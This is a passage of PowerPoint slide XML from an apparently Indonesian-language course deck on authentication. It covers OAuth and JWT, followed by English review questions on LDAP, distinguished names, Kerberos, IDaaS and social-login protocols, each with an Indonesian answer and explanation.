              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Klien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>OAuth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>JavaScript Object Notation (JSON)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Wweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Token (JWT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. JWT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> string yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikodekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Base64 di URL dan header HTTP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17284171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1. What is the purpose of implementing LDAP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>LDAP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Lightweight Directory Access Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user, group, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>centralized authentication &amp; authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mempermudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user (single sign-on, centralized user database).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Microsoft Active Directory, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>OpenLDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. True or false? The following string is an example of a distinguished name: CN=ad, DC=515support,DC=com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>True.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Distinguished Name (DN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LDAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CN = Common Name, DC = Domain Component.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. True or false? In order to create a service ticket, Kerberos passes the user’s password to the target application server for authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False.</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dirty="0"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>ticket-granting ticket (TGT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>session keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> secret key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibanding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password-based authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. You are consulting with a company about a new approach to authenticating users. You suggest there could be cost savings and better support for multifactor authentication (MFA) if your employees create accounts with a cloud provider. That allows the company’s staff to focus on authorizations and privilege management. What type of service is the cloud vendor performing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Identity as a Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>IDaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cloud vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>authentication service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (login, MFA, SSO).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Perusahaan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>authorization &amp; privilege assignment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Okta, Azure AD, Google Identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. You are working on a cloud application that allows users to log on with social media accounts over the web and from a mobile application. Which protocols would you consider, and which would you choose as most suitable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Protocols to consider:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>OAuth 2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → Delegated authorization (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> social login).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>OpenID Connect (OIDC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OAuth 2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SAML (Security Assertion Markup Language)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di enterprise SSO (web-based), </a:t>
